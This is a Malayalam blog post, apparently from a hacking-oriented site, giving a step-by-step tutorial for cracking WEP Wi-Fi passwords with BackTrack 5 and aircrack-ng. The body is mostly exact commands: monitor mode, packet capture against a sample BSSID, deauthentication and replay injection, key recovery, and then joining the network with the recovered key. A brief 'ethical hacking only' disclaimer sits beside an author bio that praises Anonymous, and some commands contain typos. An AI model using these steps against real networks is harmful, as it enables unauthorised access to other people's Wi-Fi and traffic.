വൈഫൈ എങ്ങനെ ക്രാക്ക് ചെയ്യാം

3:12 PM , 1 Comments

സൈബര്‍ സെക്കിന്‍റെ വായനക്കാരെ..ഇന്നു ഞാന്‍ നിങ്ങള്‍ക്ക് പരിജയപെടുത്തുന്നത് വൈഫൈ നെറ്റ്‌വര്‍ക്കിന്‍റെ എന്‍ക്രിപിറ്റ്ഡ് വെര്‍ഷന്‍ ആയ വെപ്പ്(WEP) എങ്ങനെ ക്രാക്ക് ചെയ്യാം എന്നതാണ്.

നിങ്ങള്‍ ദയവ് ചെയ്തു ഇതൊരു എത്തിക്കല്‍ ഹാക്കിംഗ് കോഴ്സ്‌ ആയി മാത്രം കാണുക.  കാരണം ഇങ്ങനെയാണ് ഹാക്കര്‍മാര്‍ സാധാരണ നിങ്ങളുടെ വൈഫൈ നെറ്റ്‌വര്‍ക്ക് ഹാക്ക്‌ ചെയ്യുന്നത്. എന്ന് പരിജയപെടുത്തുവാന്‍ വേണ്ടി മാത്രമാണ് ഞാന്‍ ഇത്തരമൊരു പോസ്റ്റ്‌ ഇടുന്നത്.


പിന്നെ ഒരു കാര്യം ഇത്തരം വൈഫൈ നെറ്റ്‌വര്‍ക്കുകള്‍ ക്രാക്ക് ചെയ്യുന്നതിനായി ഒരു നല്ല പ്രോസ്സസിംഗ് പവര്‍ ഉള്ള ഒരു സിസ്റ്റം വേണം. എന്നാല്‍ എത്രയും പെട്ടന്നുതന്നെ റിസള്‍ട്ട്‌ കിട്ടും. ലോക്കല്‍ ലാപ്ടോപ്പ്മായി വൈഫൈ നെറ്റ്‌വര്‍ക്ക് ഹാക്ക്‌ ചെയ്യാന്‍ പോയാല്‍ മക്കളെ ലാപ്ടോപ്പ് പിന്നെ എടുക്കാന്‍ ഉണ്ടാകില്ല #

എന്നാല്‍പ്പിന്നെ തുടങ്ങാം..?

ആദ്യംതന്നെ വൈഫൈ ക്രാക്ക് ചെയ്യാനുള്ള ടൂള്‍സ് ഒപ്പിക്കണം

# ബാക്ക്‌ ട്രാക്ക്‌ 5
# വൈഫൈ പാക്കറ്റ്സ് സെന്‍റ് & റിസിവ്  സപ്പോര്‍ട്ട് ചെയ്യുന്ന വൈഫൈ കാര്‍ഡ്‌ (പുതിയ ലാപ്‌ടോപ്പ്കളില്‍ ഇതു ഉണ്ടാക്കും @ടെസ്ക്ടോപ്പില്‍ വൈഫൈ കാര്‍ഡ്‌ ഇല്ലത്തവര്‍ wlan വാങ്ങിച്ചാല്‍ മതി.
# മിനിമം ഇറര്‍ ഇല്ലാതെ വൈഫൈ പാക്കറ്റ്സ് സെന്‍റ് & റിസിവ്  ചെയ്യുവാനുള്ള നെറ്റ്‌വര്‍ക്കിനടുതിരിക്കുക.
#  ഇത്തിരി ക്ഷമ.

ആദ്യംതന്നെ ബാക്ക്‌ ട്രാക്ക്‌ 5 എന്ന ഓ.എസ് നിങ്ങളുടെ ഒരു 4ജി ബി പെന്‍ഡ്രൈവില്‍ ബൂട്ട്ബിള്‍ ആക്കി മാറ്റുക
അതിനുശേഷം ബാക്ക്‌ ട്രാക്ക്‌ 5 ബൂട്ട് ചെയ്തു ടെര്‍മിനല്‍ ഓപ്പണ്‍ ചെയ്യുക



#1  എന്നിട്ട് അതില്‍ airmon-ng എന്ന് ടൈപ്പ് ചെയ്തു എന്റര്‍ അമര്‍ത്തുക അപ്പോള്‍ നിങ്ങളുടെ വൈഫൈ കാര്‍ഡിന്‍റെ interface : chipset :driver എന്നിവ കാണിക്കും



#2  എന്‍റെ wlan0 ആണ് ആയതുകൊണ്ട് wlan0നെ ഞാന്‍ മോണിറ്റര്‍ മോഡിലേക്ക് കൊണ്ടുവരണം അതിനായി
അതെ ടെര്‍മിനലില്‍ തന്നെ. ബാക്കി airmon-ng start wlan0 എന്ന കമാന്‍റെ ടൈപ്പ് ചെയ്യുന്നു



#3  ഇപ്പോള്‍ നിങ്ങളുടെ വൈഫൈ ഓണ്‍ ആയിക്കാണും ഇനി ചെയ്യേണ്ടത് നിങ്ങളുടെ അടുത്ത് ഏതൊക്കെ വൈഫൈ നെറ്റ്‌വര്‍ക്കുകള്‍ ഉണ്ടെന്ന്‌ അറിയാന്‍ വേണ്ടി സ്കാന്‍ ചെയ്യണം അതിനായി airodump-ng mon0 ഉപയോഗിക്കുക അപ്പോള്‍ താഴെ കാണുന്ന രീതിയില്‍ ഒരു റിസള്‍ട്ട്‌ ലഭിക്കും



അതില്‍ വൈഫൈ വെപ്പ് ഉണ്ടെങ്കില്‍ മാത്രം ബാക്കി ചെയ്താല്‍ മതി വെപ്പ്2 ആണെങ്കില്‍ അത്  എങ്ങനെ ക്രാക്ക് ചെയ്യാം എന്നത് ഞാന്‍ പിന്നെ പറഞ്ഞു തരാം.

#5  വൈഫൈ വെപ്പ്  ആണ് കിട്ടിയെതെങ്കില്‍ ആ നെറ്റ്‌വര്‍ക്കിലെ പാക്കറ്റ്സ് അടിച്ചുമാറ്റി ഒരു ഫയല്‍ ആക്കി സേവ് ചെയ്യണം അതിനായി

airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
ഇവിടെ എന്‍റെ കോഡ്
airodump-ng -c 3 -w wep --bssid 00:18:01:A7:C0:60 mon0


ഇപ്പോള്‍ നിങ്ങള്‍ക്കു വൈഫൈ വെപ്പ്ന്‍റെ പാക്കറ്റ്സ് കിട്ടികൊണ്ടേ ഇരിക്കും
ഇതു വളരെ സാവധാനം നടക്കുന്ന പ്രോസസ്സ് ആണ് ആയതുകൊണ്ട് നമുക്ക്‌ മറ്റൊരു ട്രിക്ക് ചെയ്തു സ്പീഡ്‌ കൂട്ടാം.

#6 അതിനായി മറ്റൊരു ടെര്‍മിനല്‍ ഓപ്പണ്‍ ചെയ്യുക.
അതില്‍
aireplay-ng  -0 1 -a (bssid) mon0
ഇവിടെ എന്‍റെ കോഡ്
aireplay-ng  -0 1 -a 00:18:01:A7:C0:60 mon0 ആണ്

ചിലപ്പോള്‍ കുറച്ചു സമയത്തിനകം അസോസിയേഷന്‍ സക്സസ്ഫുള്‍ എന്നൊരു റിസള്‍ട്ട്‌ വന്നാല്‍ നിങ്ങളുടെ ഭാഗ്യം.  വൈഫൈ ഹാക്ക്‌ ചെയ്യുന്നതിന്‍റെ പകുതിയോളം ഭാഗം കഴിഞ്ഞു. എന്നു കരുതാം.



#7 ഇനി വൈഫൈ വെപ്പ്ന്‍റെ പാക്കറ്റ്സ് റിസീവ്ങ് ബൂസ്റ്റ്‌ ചെയ്യാന്‍
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF -b (bssid) mono0
ഇവിടെ എന്‍റെ കോഡ്
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF -b 00:18:01:A7:C0:60 mono0
ഇപ്പോള്‍ നിങ്ങളുടെ സിസ്റ്റത്തില്‍നിന്നും പാക്കറ്റ്സ് ആ ഹാക്ക്‌ ചെയ്യേണ്ട നെറ്റ്‌വര്‍ക്കിലെക്കു പോകുകയും അതില്‍നിന്നും പാക്കറ്റ്സ് റിസിവ് ചെയ്യുന്നു തന്മുലം ഫസ്റ്റ് ചെയ്യ്ത പ്രോസസ്സ് ഇപ്പോള്‍ സ്പീഡ്‌ കുടുന്നതായി കാണാം. ഇപ്പോള്‍ത്തന്നെ use this packets ?  എന്നു വരും അപ്പോള്‍ y എന്നു ടൈപ്പ് ചെയ്തു എന്റര്‍ അമര്‍ത്തുക.



ഇപ്പോള്‍ നിങ്ങള്‍ക്ക് വെപ്പ് ക്രാക്ക് ചെയ്യാന്‍ അവിശ്യമായ പാക്കറ്റ്സ് ലഭിച്ചിട്ടുടാകും മിനിമം( 5000 packets ) ഞാന്‍ മുന്‍പ് പറഞ്ഞില്ലെ ആ അടിച്ചു മാറ്റി സേവ് ചെയ്ത പാക്കറ്റ്സ് അത് നമുക്ക് ഡിക്ര്പിറ്റ്‌ ചെയ്യണം
#8 അതിനായി പുതിയൊരു ടെര്‍മിനല്‍ തുറക്കുകയും. അതില്‍
aircrack-ng (filename)*.cap
ഇവിടെ എന്‍റെ കോഡ്
aircrack-ng wep*.cap   
wep.cap ഞാന്‍ ഈ ഫയല്‍ നെയിംലാണ് പാക്കറ്റ്സ് സേവ് ചെയ്തത് (#5)


ഇപ്പോള്‍ നിങ്ങളുടെ സിസ്റ്റം ഒന്ന് ലോഡ്‌ ആകുകയും വെപ്പ് പാക്കറ്റ്സ്  ക്രാക്ക് ചെയ്യുകയ്യം അതില്‍നിന്നും പാസ്‌വേഡ് കിട്ടുകയം ചെയ്യും ഇതുപോലെ KEY FOUND! [ XX:XX:XX:XX:XX ]



അതിലെ ആ രണ്ടു കുത്തു മായിച്ചു കളഞ്ഞു പാസ്‌വേഡ് ആയി ഉപയോഗിക്കാം ഉദഹരണത്തിനു KEY FOUND! [ 12:34:56:78:90 ]
അത് 1234567890 ആക്കി മാറ്റി നിങ്ങളുടെ വിന്‍ഡോസ്‌ സിസ്റ്റംത്തില്‍ കയറി വൈഫൈ കണക്ട് ചെയ്യുമ്പോള്‍ പാസ്സ്‌വേര്‍ഡ്‌ ആയി കൊടുക്കുക..#
വൈഫൈ ക്രാക്ക് വീഡിയോ ടുടോറിയല്‍

Admin

Founder and Editor-in-chief of 'XyberSec', I am Security Researcher and Self Proclaimed Hacker, with experience in various aspects of Internet Security. Strong supporter of Anonymous Hackers. Google